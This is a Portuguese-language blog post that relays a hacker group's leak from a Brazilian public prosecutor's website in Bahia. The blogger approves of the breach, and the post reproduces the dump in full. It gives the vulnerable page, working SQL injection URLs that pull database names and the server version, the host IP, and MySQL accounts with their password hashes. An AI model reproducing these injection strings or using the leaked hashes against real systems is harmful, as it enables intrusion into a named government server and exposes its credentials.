O que a Bahiana tem? .... tem senhas dumpadas tem... tem falha de Sql Injection tem....
Brincadeiras a parte, recebi este E-mail de um grupo que realizou algumas manifestações no pais, e liberou um exposed do ministério público da Bahia! é ... agente tenta orientar, tenta ajudar e somos mal vistos! o resultado esperado é esse mesmo, aprecie com moderação!
- The website of Ministry Of Public Work In Bahia(prt5.mpt.gov.br) has been breached by a hacker collective called Brazilian Cyber Army . Bahia is one of the 26 states of Brazil, and is located in the northeastern part of the country on the Atlantic coast.
The hack was announced by the official Twitter account of the hacker group(@TeamBCA). They tweeted a link to pastebin. In the pastebin, hacker has leaked the data stolen from the compromised server. It includes database information, credentials of MySQL. There are 14 entries with username and encrypted password.
In addition to the data dump, they have also posted the vulnerable link and poc that extracts data.
http://pastebin.com/FP5kgRHp
- # WebSite Hacked Brazilian Cyber Army
- # https://twitter.com/TeamBCA
- www.prt5.mpt.gov.br ( Ministry Of Public Work In Bahia )
- HACKED ! By Brazilian Cyber Army
- @TeamBCA
- http://www.prt5.mpt.gov.br/module/publicacoes/publicacao.php?id=2866
- Host IP: 200.142.2.150
- Current DataBase : http://www.prt5.mpt.gov.br/module/publicacoes/publicacao.php?id=-2866+union+select+1,2,group_concat%28schema_name%29,4,5,6,7,8,9,10,11,12%20from+information_schema.schemata--
- information_schema,BASETEMP,CRASH,EVENTOS,INCONFORMIDADES,LEGADOJAVA,LICENCAS,MENTORH,NEA,PORTFOLIO,PRT05,PUBLICACOES,artifactory,icescrum,mysql,prtdb
- ###### Version Of Sql : http://www.prt5.mpt.gov.br/module/publicacoes/publicacao.php?id=-2866+union+select+1,2,version%28%29,4,5,6,7,8,9,10,11,12%20from+information_schema.schemata--
- 5.0.95-log
- #### Credentials Of MySql Dump
- Host User Password
- localhost root *DF1D56BF17AD00751F917F385005D5C9213CB78F
- 127.0.0.1 root *DF1D56BF17AD00751F917F385005D5C9213CB78F
- 10.xx.1.% root *DF1D56BF17AD00751F917F385005D5C9213CB78F
- 10.5.0.0/255.255.224.0 root *DF1D56BF17AD00751F917F385005D5C9213CB78F
- %.prt5.mpt.gov.br root *DF1D56BF17AD00751F917F385005D5C9213CB78F
- 10.%.1.% root *DF1D56BF17AD00751F917F385005D5C9213CB78F
- 10.% root *DF1D56BF17AD00751F917F385005D5C9213CB78F
- % admin *680978BAB8170F699D5BC8E8DF395C901C5AE6E7
- % consulta *C09343BB7BFE0530FCF27E62FC6E500B683F2888
- % root *DF1D56BF17AD00751F917F385005D5C9213CB78F
- localhost artifactory *90587EAEDD9391F810FEA59BC995A096DA005CA0
- % artifactory *90587EAEDD9391F810FEA59BC995A096DA005CA0
- % Uinternet *E022D3851EE3C7E31266B683EBCDF314067A79EA
- % icescrum *7EBD9C89C88A482185A63BF0127537DB324EE811
0 comentários:
Postar um comentário